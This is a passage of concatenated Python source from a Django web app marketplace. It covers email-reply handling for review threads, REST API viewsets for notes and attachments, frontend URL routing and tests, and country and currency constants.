self.decode_error = True
return
self.email = message_from_string(email_text)
self.reply_text = EmailReplyParser.read(self.email.get_payload()).reply
def _get_address_line(self):
return parseaddr(self.email['to'])
def get_uuid(self):
name, addr = self._get_address_line()
if addr.startswith(self.address_prefix):
# Strip everything between "reply+" and the "@" sign.
uuid = addr[len(self.address_prefix):].split('@')[0]
else:
log.info('TO: address missing or not related to comm. (%s)'
% unicode(self.email).strip())
return False
return uuid
def get_body(self):
return self.reply_text
def save_from_email_reply(reply_text):
parser = CommEmailParser(reply_text)
if hasattr(parser, 'decode_error'):
return False
uuid = parser.get_uuid()
if not uuid:
return False
try:
tok = CommunicationThreadToken.objects.get(uuid=uuid)
except CommunicationThreadToken.DoesNotExist:
log.error('An email was skipped with non-existing uuid %s.' % uuid)
return False
if user_has_perm_thread(tok.thread, tok.user) and tok.is_valid():
t, note = create_comm_note(tok.thread.addon, tok.thread.version,
tok.user, parser.get_body())
log.info('A new note has been created (from %s using tokenid %s).'
% (tok.user.id, uuid))
return note
elif tok.is_valid():
log.error('%s did not have perms to reply to comm email thread %s.'
% (tok.user.email, tok.thread.id))
else:
log.error('%s tried to use an invalid comm token for thread %s.'
% (tok.user.email, tok.thread.id))
return False
def filter_notes_by_read_status(queryset, profile, read_status=True):
"""
Filter read/unread notes using this method.
`read_status` = `True` for read notes, `False` for unread notes.
"""
# Get some read notes from db.
notes = list(CommunicationNoteRead.objects.filter(
user=profile).values_list('note', flat=True))
if read_status:
# Filter and return read notes if they exist.
return queryset.filter(pk__in=notes) if notes else queryset.none()
else:
# Exclude read notes if they exist.
return queryset.exclude(pk__in=notes) if notes else queryset.all()
def get_reply_token(thread, user_id):
tok, created = CommunicationThreadToken.objects.get_or_create(
thread=thread, user_id=user_id)
# We expire a token after it has been used for a maximum number of times.
# This is usually to prevent overusing a single token to spam to threads.
# Since we're re-using tokens, we need to make sure they are valid for
# replying to new notes so we reset their `use_count`.
if not created:
tok.update(use_count=0)
else:
log.info('Created token with UUID %s for user_id: %s.' %
(tok.uuid, user_id))
return tok
def get_recipients(note):
"""
Determine email recipients based on a new note based on those who are on
the thread_cc list and note permissions.
Returns reply-to-tokenized emails.
"""
thread = note.thread
recipients = []
# Whitelist: include recipients.
if note.note_type == comm.ESCALATION:
# Email only senior reviewers on escalations.
seniors = Group.objects.get(name='Senior App Reviewers')
recipients = seniors.users.values_list('id', 'email')
else:
# Get recipients via the CommunicationThreadCC table, which is usually
# populated with the developer, the Mozilla contact, and anyone that
# posts to and reviews the app.
recipients = set(thread.thread_cc.values_list(
'user__id', 'user__email'))
# Blacklist: exclude certain people from receiving the email based on
# permission.
excludes = []
if not note.read_permission_developer:
# Exclude developer.
excludes += thread.addon.authors.values_list('id', 'email')
# Exclude note author.
excludes.append((note.author.id, note.author.email))
# Remove excluded people from the recipients.
recipients = [r for r in recipients if r not in excludes]
# Build reply-to-tokenized email addresses.
new_recipients_list = []
for user_id, user_email in recipients:
tok = get_reply_token(note.thread, user_id)
new_recipients_list.append((user_email, tok.uuid))
return new_recipients_list
def send_mail_comm(note):
"""
Email utility used globally by the Communication Dashboard to send emails.
Given a note (its actions and permissions), recipients are determined and
emails are sent to appropriate people.
"""
from mkt.reviewers.utils import send_mail
if not waffle.switch_is_active('comm-dashboard'):
return
recipients = get_recipients(note)
name = note.thread.addon.name
data = {
'name': name,
'sender': note.author.name,
'comments': note.body,
'thread_id': str(note.thread.id)
}
subject = {
comm.ESCALATION: u'Escalated Review Requested: %s' % name,
}.get(note.note_type, u'Submission Update: %s' % name)
log.info(u'Sending emails for %s' % note.thread.addon)
for email, tok in recipients:
reply_to = '{0}{1}@{2}'.format(comm.REPLY_TO_PREFIX, tok,
settings.POSTFIX_DOMAIN)
send_mail(subject, 'reviewers/emails/decisions/post.txt', data,
[email], perm_setting='app_reviewed', reply_to=reply_to)
def create_comm_note(app, version, author, body, note_type=comm.NO_ACTION,
perms=None, no_switch=False, attachments=None):
"""
Creates a note on an app version's thread.
Creates a thread if a thread doesn't already exist.
CC's app's Mozilla contacts to auto-join thread.
app -- app object.
version -- app version.
author -- UserProfile for the note's author.
body -- string/text for note comment.
note_type -- integer for note_type (mkt constant), defaults to 0/NO_ACTION
(e.g. comm.APPROVAL, comm.REJECTION, comm.NO_ACTION).
perms -- object of groups to grant permission to, will set flags on Thread.
(e.g. {'developer': False, 'staff': True}).
no_switch -- whether to ignore comm switch, needed after we migrate
reviewer tools from ActivityLog to notes.
attachments -- formset of attachment files
"""
if not no_switch and not waffle.switch_is_active('comm-dashboard'):
return None, None
# Dict of {'read_permission_GROUP_TYPE': boolean}.
# Perm for reviewer, senior_reviewer, moz_contact, staff True by default.
# Perm for developer False if is escalation or reviewer comment by default.
perms = perms or {}
if 'developer' not in perms and note_type in (comm.ESCALATION,
comm.REVIEWER_COMMENT):
perms['developer'] = False
create_perms = dict(('read_permission_%s' % key, has_perm)
for key, has_perm in perms.iteritems())
# Create thread + note.
thread, created_thread = app.threads.safer_get_or_create(
version=version, defaults=create_perms)
note = thread.notes.create(
note_type=note_type, body=body, author=author, **create_perms)
if attachments:
create_attachments(note, attachments)
post_create_comm_note(note)
return thread, note
def post_create_comm_note(note):
"""Stuff to do after creating note, also used in comm api's post_save."""
thread = note.thread
app = thread.addon
# Add developer to thread.
for developer in app.authors.all():
thread.join_thread(developer)
# Add Mozilla contact to thread.
for email in app.get_mozilla_contacts():
try:
moz_contact = UserProfile.objects.get(email=email)
thread.join_thread(moz_contact)
except UserProfile.DoesNotExist:
pass
# Add note author to thread.
author = note.author
cc, created_cc = thread.join_thread(author)
if not created_cc:
# Mark their own note as read.
note.mark_read(note.author)
# Send out emails.
send_mail_comm(note)
def create_attachments(note, formset):
"""Create attachments from CommAttachmentFormSet onto note."""
errors = []
storage = get_storage_class()()
for form in formset:
if not form.is_valid():
errors.append(form.errors)
continue
data = form.cleaned_data
if not data:
continue
attachment = data['attachment']
attachment_name = _save_attachment(
storage, attachment,
'%s/%s' % (settings.REVIEWER_ATTACHMENTS_PATH, attachment.name))
note.attachments.create(
description=data.get('description'), filepath=attachment_name,
mimetype=attachment.content_type)
return errors
def _save_attachment(storage, attachment, filepath):
"""Saves an attachment and returns the filename."""
filepath = storage.save(filepath, attachment)
# In case of duplicate filename, storage suffixes filename.
return filepath.split('/')[-1]
########NEW FILE########
__FILENAME__ = views
import os
from django.conf import settings
from django.db.models import Q
from django.shortcuts import get_object_or_404
import waffle
from rest_framework import status
from rest_framework.authentication import BaseAuthentication
from rest_framework.decorators import (api_view, authentication_classes,
permission_classes)
from rest_framework.exceptions import ParseError
from rest_framework.fields import BooleanField
from rest_framework.filters import BaseFilterBackend, OrderingFilter
from rest_framework.mixins import (CreateModelMixin, DestroyModelMixin,
ListModelMixin, RetrieveModelMixin)
from rest_framework.parsers import FormParser, JSONParser
from rest_framework.response import Response
from rest_framework.viewsets import GenericViewSet
from amo.decorators import skip_cache
from amo.utils import HttpResponseSendFile
import mkt.comm.forms as forms
import mkt.constants.comm as comm
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import CORSMixin, MarketplaceView, SilentListModelMixin
from mkt.comm.authorization import (AttachmentPermission,
EmailCreationPermission, NotePermission,
ThreadPermission)
from mkt.comm.models import (CommAttachment, CommunicationNote,
CommunicationNoteRead, CommunicationThread,
CommunicationThreadCC)
from mkt.comm.serializers import NoteSerializer, ThreadSerializer
from mkt.comm.models import user_has_perm_app
from mkt.comm.tasks import consume_email, mark_thread_read
from mkt.comm.utils import (create_attachments, create_comm_note,
filter_notes_by_read_status)
class NoAuthentication(BaseAuthentication):
def authenticate(self, request):
return request._request.user, None
class ReadUnreadFilter(BaseFilterBackend):
filter_param = 'show_read'
def filter_queryset(self, request, queryset, view):
"""
Return only read notes if `show_read=true` is truthy and only unread
notes if `show_read=false.
"""
val = request.GET.get('show_read')
if val is None:
return queryset
show_read = BooleanField().from_native(val)
return filter_notes_by_read_status(queryset, request.amo_user,
show_read)
class CommViewSet(CORSMixin, MarketplaceView, GenericViewSet):
"""Some overriding and mixin stuff to adapt other viewsets."""
parser_classes = (FormParser, JSONParser)
def patched_get_request(self):
return lambda x: self.request
def get_serializer_class(self):
original = super(CommViewSet, self).get_serializer_class()
original.get_request = self.patched_get_request()
return original
def partial_update(self, request, *args, **kwargs):
val = BooleanField().from_native(request.DATA.get('is_read'))
if val:
self.mark_as_read(request.amo_user)
return Response(status=status.HTTP_204_NO_CONTENT)
else:
return Response('Requested update operation not supported',
status=status.HTTP_403_FORBIDDEN)
class ThreadViewSet(SilentListModelMixin, RetrieveModelMixin,
DestroyModelMixin, CreateModelMixin, CommViewSet):
model = CommunicationThread
serializer_class = ThreadSerializer
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
permission_classes = (ThreadPermission,)
filter_backends = (OrderingFilter,)
cors_allowed_methods = ['get', 'post', 'patch']
@skip_cache
def list(self, request):
self.serializer_class = ThreadSerializer
profile = request.amo_user
# We list all the threads where the user has been CC'd.
cc = list(profile.comm_thread_cc.values_list('thread', flat=True))
# This gives 404 when an app with given slug/id is not found.
data = {}
if 'app' in request.GET:
form = forms.AppSlugForm(request.GET)
if not form.is_valid():
return Response('App does not exist or no app slug given',
status=status.HTTP_404_NOT_FOUND)
elif not user_has_perm_app(profile, form.cleaned_data['app']):
return Response('You do not have permissions for this app',
status=status.HTTP_403_FORBIDDEN)
queryset = CommunicationThread.objects.filter(
addon=form.cleaned_data['app'])
# Thread IDs and version numbers from same app.
data['app_threads'] = list(queryset.order_by('version__version')
.values('id', 'version__version'))
else:
# We list all the threads that user is developer of or
# is subscribed/CC'ed to.
addons = list(profile.addons.values_list('pk', flat=True))
q_dev = Q(addon__in=addons, read_permission_developer=True)
queryset = CommunicationThread.objects.filter(
Q(pk__in=cc) | q_dev)
self.queryset = queryset
res = SilentListModelMixin.list(self, request)
if res.data:
res.data.update(data)
return res
def retrieve(self, *args, **kwargs):
res = super(ThreadViewSet, self).retrieve(*args, **kwargs)
# Thread IDs and version numbers from same app.
res.data['app_threads'] = list(
CommunicationThread.objects.filter(addon_id=res.data['addon'])
.order_by('version__version').values('id', 'version__version'))
return res
def create(self, request, *args, **kwargs):
if not waffle.switch_is_active('comm-dashboard'):
return Response(status=status.HTTP_403_FORBIDDEN)
form = forms.CreateCommThreadForm(request.DATA)
if not form.is_valid():
return Response(
form.errors, status=status.HTTP_400_BAD_REQUEST)
app = form.cleaned_data['app']
version = form.cleaned_data['version']
thread, note = create_comm_note(
app, version, request.amo_user, form.cleaned_data['body'],
note_type=form.cleaned_data['note_type'])
return Response(
NoteSerializer(note, context={'request': self.request}).data,
status=status.HTTP_201_CREATED)
def mark_as_read(self, profile):
mark_thread_read(self.get_object(), profile)
class NoteViewSet(ListModelMixin, CreateModelMixin, RetrieveModelMixin,
DestroyModelMixin, CommViewSet):
model = CommunicationNote
serializer_class = NoteSerializer
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
permission_classes = (NotePermission,)
filter_backends = (OrderingFilter, ReadUnreadFilter)
cors_allowed_methods = ['get', 'patch', 'post']
def get_queryset(self):
return CommunicationNote.objects.with_perms(
self.request.amo_user, self.comm_thread)
def create(self, request, *args, **kwargs):
if not waffle.switch_is_active('comm-dashboard'):
return Response(status=status.HTTP_403_FORBIDDEN)
thread = get_object_or_404(CommunicationThread, id=kwargs['thread_id'])
# Validate note.
form = forms.CreateCommNoteForm(request.DATA)
if not form.is_valid():
return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)
# Create notes.
thread, note = create_comm_note(
thread.addon, thread.version, self.request.amo_user,
form.cleaned_data['body'],
note_type=form.cleaned_data['note_type'])
return Response(
NoteSerializer(note, context={'request': request}).data,
status=status.HTTP_201_CREATED)
def mark_as_read(self, profile):
CommunicationNoteRead.objects.get_or_create(note=self.get_object(),
user=profile)
class AttachmentViewSet(CreateModelMixin, CommViewSet):
model = CommAttachment
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
permission_classes = (AttachmentPermission,)
cors_allowed_methods = ['get', 'post']
def get(self, request, note_id, pk, *args, **kwargs):
attach = get_object_or_404(CommAttachment, pk=pk)
self.check_object_permissions(request, attach)
full_path = os.path.join(settings.REVIEWER_ATTACHMENTS_PATH,
attach.filepath)
content_type = 'application/force-download'
if attach.is_image():
content_type = 'image'
return HttpResponseSendFile(
request, full_path, content_type=content_type)
def create(self, request, note_id, *args, **kwargs):
note = get_object_or_404(CommunicationNote, id=note_id)
if not note.author.id == request.amo_user.id:
return Response(
[{'non_field_errors':
'You must be owner of the note to attach a file.'}],
status=status.HTTP_403_FORBIDDEN)
# Validate attachment.
attachment_formset = None
if request.FILES:
data = request.POST.copy()
data.update({
'form-TOTAL_FORMS': len([k for k in request.FILES if
k.endswith('-attachment')]),
'form-INITIAL_FORMS': 0,
'form-MAX_NUM_FORMS': comm.MAX_ATTACH
})
if data['form-TOTAL_FORMS'] > comm.MAX_ATTACH:
# TODO: use formset validate_max=True in Django 1.6.
return Response(
[{'non_field_errors':
'Maximum of %s files can be attached.'}],
status=status.HTTP_400_BAD_REQUEST)
attachment_formset = forms.CommAttachmentFormSet(
data=data, files=request.FILES or None)
if not attachment_formset.is_valid():
return Response(attachment_formset.errors,
status=status.HTTP_400_BAD_REQUEST)
else:
return Response([{'non_field_errors': 'No files were attached.'}],
status=status.HTTP_400_BAD_REQUEST)
# Create attachment.
if attachment_formset:
create_attachments(note, attachment_formset)
return Response(
NoteSerializer(note, context={'request': request}).data,
status=status.HTTP_201_CREATED)
def mark_as_read(self, profile):
CommunicationNoteRead.objects.get_or_create(note=self.get_object(),
user=profile)
class ThreadCCViewSet(DestroyModelMixin, CommViewSet):
model = CommunicationThreadCC
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
permission_classes = ()
cors_allowed_methods = ['delete']
def destroy(self, request, **kw):
form = forms.UnCCForm(kw)
if not form.is_valid():
return Response(status=status.HTTP_400_BAD_REQUEST)
CommunicationThreadCC.objects.filter(
thread=form.cleaned_data['pk'],
user=request.amo_user).delete()
return Response("Successfully un-cc'ed from thread.",
status=status.HTTP_204_NO_CONTENT)
@api_view(['POST'])
@authentication_classes((NoAuthentication,))
@permission_classes((EmailCreationPermission,))
def post_email(request):
email_body = request.POST.get('body')
if not email_body:
raise ParseError(
detail='email_body not present in the POST data.')
consume_email.apply_async((email_body,))
return Response(status=status.HTTP_201_CREATED)
########NEW FILE########
__FILENAME__ = test_views
from django.conf import settings
import mock
from nose import SkipTest
from nose.tools import eq_
import amo.tests
from amo.utils import reverse
class TestCommonplace(amo.tests.TestCase):
def test_fireplace(self):
res = self.client.get('/server.html')
self.assertTemplateUsed(res, 'commonplace/index.html')
self.assertEquals(res.context['repo'], 'fireplace')
def test_commbadge(self):
res = self.client.get('/comm/')
self.assertTemplateUsed(res, 'commonplace/index.html')
self.assertEquals(res.context['repo'], 'commbadge')
def test_rocketfuel(self):
res = self.client.get('/curation/')
self.assertTemplateUsed(res, 'commonplace/index.html')
self.assertEquals(res.context['repo'], 'rocketfuel')
def test_fireplace_persona_js_not_included_on_firefox_os(self):
# Temporarily enabling include.js shim (bug 992334).
raise SkipTest
for url in ('/server.html?mccs=blah',
'/server.html?mcc=blah&mnc=blah',
'/server.html?nativepersona=true'):
res = self.client.get(url)
self.assertNotContains(res, 'login.persona.org/include.js')
def test_fireplace_persona_js_is_included_elsewhere(self):
for url in ('/server.html', '/server.html?mcc=blah'):
res = self.client.get(url)
self.assertContains(res, 'login.persona.org/include.js" async')
def test_rocketfuel_persona_js_is_included(self):
for url in ('/curation/', '/curation/?nativepersona=true'):
res = self.client.get(url)
self.assertContains(res, 'login.persona.org/include.js" defer')
class TestAppcacheManifest(amo.tests.TestCase):
def test_no_repo(self):
if 'fireplace' not in settings.COMMONPLACE_REPOS_APPCACHED:
raise SkipTest
res = self.client.get(reverse('commonplace.appcache'))
eq_(res.status_code, 404)
def test_bad_repo(self):
if 'fireplace' not in settings.COMMONPLACE_REPOS_APPCACHED:
raise SkipTest
res = self.client.get(reverse('commonplace.appcache'),
{'repo': 'rocketfuel'})
eq_(res.status_code, 404)
@mock.patch('mkt.commonplace.views.get_build_id', new=lambda x: 'p00p')
@mock.patch('mkt.commonplace.views.get_imgurls')
def test_good_repo(self, get_imgurls_mock):
if 'fireplace' not in settings.COMMONPLACE_REPOS_APPCACHED:
raise SkipTest
img = '/media/img/icons/eggs/h1.gif'
get_imgurls_mock.return_value = [img]
res = self.client.get(reverse('commonplace.appcache'),
{'repo': 'fireplace'})
eq_(res.status_code, 200)
assert '# BUILD_ID p00p' in res.content
img = img.replace('/media/', '/media/fireplace/')
assert img + '\n' in res.content
class TestIFrameInstall(amo.tests.TestCase):
def test_basic(self):
res = self.client.get(reverse('commonplace.iframe-install'))
eq_(res.status_code, 200)
########NEW FILE########
__FILENAME__ = urls
from django.conf import settings
from django.conf.urls import include, patterns, url
import amo
from . import views
def fireplace_route(path, name=None):
"""
Helper function for building Fireplace URLs. `path` is the URL route,
and `name` (if specified) is the name given to the route.
"""
kwargs = {}
if name:
kwargs['name'] = name
return url('^%s$' % path, views.commonplace, {'repo': 'fireplace'},
**kwargs)
fireplace_reviews_patterns = patterns('',
fireplace_route('flag', 'ratings.flag'),
fireplace_route('delete', 'ratings.delete'),
)
fireplace_app_patterns = patterns('',
fireplace_route('', 'detail'),
fireplace_route('abuse', 'detail.abuse'),
fireplace_route('privacy', 'detail.privacy'),
fireplace_route('reviews/', 'ratings.list'),
fireplace_route('reviews/add', 'ratings.add'),
url('^(?P<review_id>\d+)/', include(fireplace_reviews_patterns)),
)
urlpatterns = patterns('',
# Fireplace:
url('^$', views.commonplace, {'repo': 'fireplace'}, name='home'),
url('^server.html$', views.commonplace, {'repo': 'fireplace'},
name='commonplace.fireplace'),
('^app/%s/' % amo.APP_SLUG, include(fireplace_app_patterns)),
url(r'^iframe-install.html/$', views.iframe_install,
name='commonplace.iframe-install'),
# Commbadge:
url('^comm/app/%s$' % amo.APP_SLUG, views.commonplace,
{'repo': 'commbadge'},
name='commonplace.commbadge.app_dashboard'),
url('^comm/thread/(?P<thread_id>\d+)$', views.commonplace,
{'repo': 'commbadge'},
name='commonplace.commbadge.show_thread'),
url('^comm/.*$', views.commonplace, {'repo': 'commbadge'},
name='commonplace.commbadge'),
# Rocketfuel:
url('^curation/.*$', views.commonplace, {'repo': 'rocketfuel'},
name='commonplace.rocketfuel'),
# Stats:
url('^statistics/app/%s$' % amo.APP_SLUG, views.commonplace,
{'repo': 'marketplace-stats'},
name='commonplace.stats.app_dashboard'),
url('^statistics/.*$', views.commonplace, {'repo': 'marketplace-stats'},
name='commonplace.stats'),
url('^manifest.appcache$', views.appcache_manifest,
name='commonplace.appcache'),
)
if settings.DEBUG:
# More Fireplace stuff, only for local dev:
urlpatterns += patterns('',
fireplace_route('category/.*'),
fireplace_route('collection/.*'),
fireplace_route('debug'),
fireplace_route('feedback'),
fireplace_route('privacy-policy'),
fireplace_route('purchases'),
fireplace_route('search/?'),
fireplace_route('settings'),
fireplace_route('terms-of-use'),
fireplace_route('tests'),
)
########NEW FILE########
__FILENAME__ = views
import datetime
import importlib
import os
from urlparse import urlparse
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.http import HttpResponse, HttpResponseNotFound
from django.shortcuts import render
import jingo
import jinja2
import newrelic.agent
from cache_nuggets.lib import memoize
def get_build_id(repo):
try:
# This is where the `build_{repo}.py` files get written to after
# compiling and minifying our assets.
# Get the `BUILD_ID` from `build_{repo}.py` and use that to
# cache-bust the assets for this repo's CSS/JS minified bundles.
module = 'build_%s' % repo
return importlib.import_module(module).BUILD_ID
except (ImportError, AttributeError):
try:
build_id_fn = os.path.join(settings.MEDIA_ROOT, repo, 'build_id.txt')
with storage.open(build_id_fn) as fh:
return fh.read()
except:
# Either `build_{repo}.py` does not exist or `build_{repo}.py`
# exists but does not contain `BUILD_ID`. Fall back to
# `BUILD_ID_JS` which is written to `build.py` by jingo-minify.
try:
from build import BUILD_ID_CSS
return BUILD_ID_CSS
except ImportError:
return 'dev'
def get_imgurls(repo):
imgurls_fn = os.path.join(settings.MEDIA_ROOT, repo, 'imgurls.txt')
with storage.open(imgurls_fn) as fh:
return list(set(fh.readlines()))
def commonplace(request, repo, **kwargs):
if repo not in settings.COMMONPLACE_REPOS:
return HttpResponseNotFound
BUILD_ID = get_build_id(repo)
site_settings = {
'persona_unverified_issuer': settings.BROWSERID_DOMAIN
}
ua = request.META.get('HTTP_USER_AGENT', '').lower()
include_persona = True
if repo == 'fireplace':
if (request.GET.get('nativepersona') or
'mccs' in request.GET or
('mcc' in request.GET and 'mnc' in request.GET)):
include_persona = False
# Temporarily enabling include.js shim (bug 992334).
include_persona = True
ctx = {
'BUILD_ID': BUILD_ID,
'appcache': repo in settings.COMMONPLACE_REPOS_APPCACHED,
'include_persona': include_persona,
'repo': repo,
'robots': 'googlebot' in ua,
'site_settings': site_settings,
'newrelic_header': newrelic.agent.get_browser_timing_header,
'newrelic_footer': newrelic.agent.get_browser_timing_footer,
}
media_url = urlparse(settings.MEDIA_URL)
if media_url.netloc:
ctx['media_origin'] = media_url.scheme + '://' + media_url.netloc
return render(request, 'commonplace/index.html', ctx)
def appcache_manifest(request):
"""Serves the appcache manifest."""
repo = request.GET.get('repo')
if not repo or repo not in settings.COMMONPLACE_REPOS_APPCACHED:
return HttpResponseNotFound()
template = appcache_manifest_template(repo)
return HttpResponse(template, mimetype='text/cache-manifest')
@memoize('appcache-manifest-template')
def appcache_manifest_template(repo):
ctx = {
'BUILD_ID': get_build_id(repo),
'imgurls': get_imgurls(repo),
'repo': repo,
'timestamp': datetime.datetime.now(),
}
t = jingo.env.get_template('commonplace/manifest.appcache').render(ctx)
return unicode(jinja2.Markup(t))
def iframe_install(request):
return render(request, 'commonplace/iframe-install.html')
########NEW FILE########
__FILENAME__ = apps
from tower import ugettext_lazy as _
INSTALL_TYPE_USER = 0
INSTALL_TYPE_REVIEWER = 1
INSTALL_TYPE_DEVELOPER = 2
INSTALL_TYPES = {
INSTALL_TYPE_USER: _('User'),
INSTALL_TYPE_REVIEWER: _('Reviewer'),
INSTALL_TYPE_DEVELOPER: _('Developer')
}
########NEW FILE########
__FILENAME__ = bango
# -*- coding: utf8 -*-
from lib.constants import ALL_CURRENCIES
from tower import ugettext_lazy as _lazy
# From page 10 of the Mozilla Exporter API docs v1.0.0
BANGO_CURRENCIES = ['AUD', 'CAD', 'CHF', 'COP', 'DKK', 'EGP', 'EUR', 'GBP',
'IDR', 'MXN', 'MYR', 'NOK', 'NZD', 'PHP', 'PLN', 'QAR',
'SEK', 'SGD', 'THB', 'USD', 'ZAR']
BANGO_CURRENCIES = dict((k, ALL_CURRENCIES[k]) for k in BANGO_CURRENCIES)
BANGO_OUTPAYMENT_CURRENCIES = ['EUR', 'GBP', 'USD']
BANGO_OUTPAYMENT_CURRENCIES = [(k, ALL_CURRENCIES[k])
for k in BANGO_OUTPAYMENT_CURRENCIES]
BANGO_COUNTRIES = [
('AFG', _lazy(u'Afghanistan')),
('ALA', _lazy(u'Åland Islands')),
('ALB', _lazy(u'Albania')),
('DZA', _lazy(u'Algeria')),
('ASM', _lazy(u'American Samoa')),
('AND', _lazy(u'Andorra')),
('AGO', _lazy(u'Angola')),
('AIA', _lazy(u'Anguilla')),
('ATA', _lazy(u'Antarctica')),
('ATG', _lazy(u'Antigua and Barbuda')),
('ARG', _lazy(u'Argentina')),
('ARM', _lazy(u'Armenia')),
('ABW', _lazy(u'Aruba')),
('AUS', _lazy(u'Australia')),
('AUT', _lazy(u'Austria')),
('AZE', _lazy(u'Azerbaijan')),
('BHS', _lazy(u'Bahamas')),
('BHR', _lazy(u'Bahrain')),
('BGD', _lazy(u'Bangladesh')),
('BRB', _lazy(u'Barbados')),
('BLR', _lazy(u'Belarus')),
('BEL', _lazy(u'Belgium')),
('BLZ', _lazy(u'Belize')),
('BEN', _lazy(u'Benin')),
('BMU', _lazy(u'Bermuda')),
('BTN', _lazy(u'Bhutan')),
('BOL', _lazy(u'Bolivia')),
('BES', _lazy(u'Bonaire, Saint Eustatius and Saba')),
('BIH', _lazy(u'Bosnia and Herzegovina')),
('BWA', _lazy(u'Botswana')),
('BVT', _lazy(u'Bouvet Island')),
('BRA', _lazy(u'Brazil')),
('IOT', _lazy(u'British Indian Ocean Territory')),
('BRN', _lazy(u'Brunei Darussalam')),
('BGR', _lazy(u'Bulgaria')),
('BFA', _lazy(u'Burkina Faso')),
('BDI', _lazy(u'Burundi')),
('KHM', _lazy(u'Cambodia')),
('CMR', _lazy(u'Cameroon')),
('CAN', _lazy(u'Canada')),
('CPV', _lazy(u'Cape Verde')),
('CYM', _lazy(u'Cayman Islands')),
('CAF', _lazy(u'Central African Republic')),
('TCD', _lazy(u'Chad')),
('CHL', _lazy(u'Chile')),
('CHN', _lazy(u'China')),
('CXR', _lazy(u'Christmas Island')),
('CCK', _lazy(u'Cocos (Keeling) Islands')),
('COL', _lazy(u'Colombia')),
('COM', _lazy(u'Comoros')),
('COG', _lazy(u'Congo')),
('COD', _lazy(u'Congo, Democratic Republic')),
('COK', _lazy(u'Cook Islands')),
('CRI', _lazy(u'Costa Rica')),
('CIV', _lazy(u"Côte d'Ivoire")),
('HRV', _lazy(u'Croatia')),
('CUB', _lazy(u'Cuba')),
('CUW', _lazy(u'Curaçao')),
('CYP', _lazy(u'Cyprus')),
('CZE', _lazy(u'Czech Republic')),
('DNK', _lazy(u'Denmark Do')),
('DJI', _lazy(u'Djibouti')),
('DMA', _lazy(u'Dominica')),
('DOM', _lazy(u'Dominican Republic')),
('ECU', _lazy(u'Ecuador')),
('EGY', _lazy(u'Egypt')),
('SLV', _lazy(u'El Salvador')),
('GNQ', _lazy(u'Equatorial Guinea')),
('ERI', _lazy(u'Eritrea')),
('EST', _lazy(u'Estonia')),
('ETH', _lazy(u'Ethiopia')),
('FLK', _lazy(u'Falkland Islands (Malvinas)')),
('FRO', _lazy(u'Faroe Islands')),
('FJI', _lazy(u'Fiji')),
('FIN', _lazy(u'Finland')),
('FRA', _lazy(u'France')),
('GUF', _lazy(u'French Guiana')),
('PYF', _lazy(u'French Polynesia')),
('ATF', _lazy(u'French Southern Territories')),
('GAB', _lazy(u'Gabon')),
('GMB', _lazy(u'Gambia')),
('GEO', _lazy(u'Georgia')),
('DEU', _lazy(u'Germany')),
('GHA', _lazy(u'Ghana')),
('GIB', _lazy(u'Gibraltar')),
('GRC', _lazy(u'Greece')),
('GRL', _lazy(u'Greenland')),
('GRD', _lazy(u'Grenada')),
('GLP', _lazy(u'Guadeloupe')),
('GUM', _lazy(u'Guam')),
('GTM', _lazy(u'Guatemala')),
('GGY', _lazy(u'Guernsey')),
('GIN', _lazy(u'Guinea')),
('GNB', _lazy(u'Guinea-Bissau')),
('GUY', _lazy(u'Guyana')),
('HTI', _lazy(u'Haiti')),
('HMD', _lazy(u'Heard and McDonald Islands')),
('VAT', _lazy(u'Holy See (Vatican City State)')),
('HND', _lazy(u'Honduras')),
('HKG', _lazy(u'Hong Kong')),
('HUN', _lazy(u'Hungary')),
('ISL', _lazy(u'Iceland')),
('IND', _lazy(u'India')),
('IDN', _lazy(u'Indonesia')),
('IRN', _lazy(u'Iran, Islamic Republic of')),
('IRQ', _lazy(u'Iraq')),
('IRL', _lazy(u'Ireland')),
('IMN', _lazy(u'Isle of Man')),
('ISR', _lazy(u'Israel')),
('ITA', _lazy(u'Italy')),
('JAM', _lazy(u'Jamaica')),
('JPN', _lazy(u'Japan')),
('JEY', _lazy(u'Jersey')),
('JOR', _lazy(u'Jordan')),
('KAZ', _lazy(u'Kazakhstan')),
('KEN', _lazy(u'Kenya')),
('KIR', _lazy(u'Kiribati')),
('PRK', _lazy(u"Korea, Democratic People's Rep")),
('KOR', _lazy(u'Korea, Republic of')),
('KOS', _lazy(u'Kosovo')),
('KWT', _lazy(u'Kuwait')),
('KGZ', _lazy(u'Kyrgyzstan')),
('LAO', _lazy(u"Lao People's Democratic Rep")),
('LVA', _lazy(u'Latvia')),
('LBN', _lazy(u'Lebanon')),
('LSO', _lazy(u'Lesotho')),
('LBR', _lazy(u'Liberia')),
('LBY', _lazy(u'Libyan Arab Jamahiriya')),
('LIE', _lazy(u'Liechtenstei')),
('LTU', _lazy(u'Lithuania')),
('LUX', _lazy(u'Luxembourg')),
('MAC', _lazy(u'Macao')),
('MKD', _lazy(u'Macedonia, Former Yugoslav Rep')),
('MDG', _lazy(u'Madagascar')),
('MWI', _lazy(u'Malawi')),
('MYS', _lazy(u'Malaysia')),
('MDV', _lazy(u'Maldives')),
('MLI', _lazy(u'Mali')),
('MLT', _lazy(u'Malta')),
('MHL', _lazy(u'Marshall Islands')),
('MTQ', _lazy(u'Martinique')),
('MRT', _lazy(u'Mauritania')),
('MUS', _lazy(u'Mauritius')),
('MYT', _lazy(u'Mayotte')),
('MEX', _lazy(u'Mexico')),
('FSM', _lazy(u'Micronesia, Federated States of')),
('MDA', _lazy(u'Moldova, Republic of')),
('MCO', _lazy(u'Monaco')),
('MNG', _lazy(u'Mongolia')),
('MNE', _lazy(u'Montenegro')),
('MSR', _lazy(u'Montserrat')),
('MAR', _lazy(u'Morocco')),
('MOZ', _lazy(u'Mozambique')),
('MMR', _lazy(u'Myanmar')),
('NAM', _lazy(u'Namibia')),
('NRU', _lazy(u'Nauru')),
('NPL', _lazy(u'Nepal')),
('NLD', _lazy(u'Netherlands')),
('NCL', _lazy(u'New Caledonia')),
('NZL', _lazy(u'New Zealand')),
('NIC', _lazy(u'Nicaragua')),
('NER', _lazy(u'Niger')),
('NGA', _lazy(u'Nigeria')),
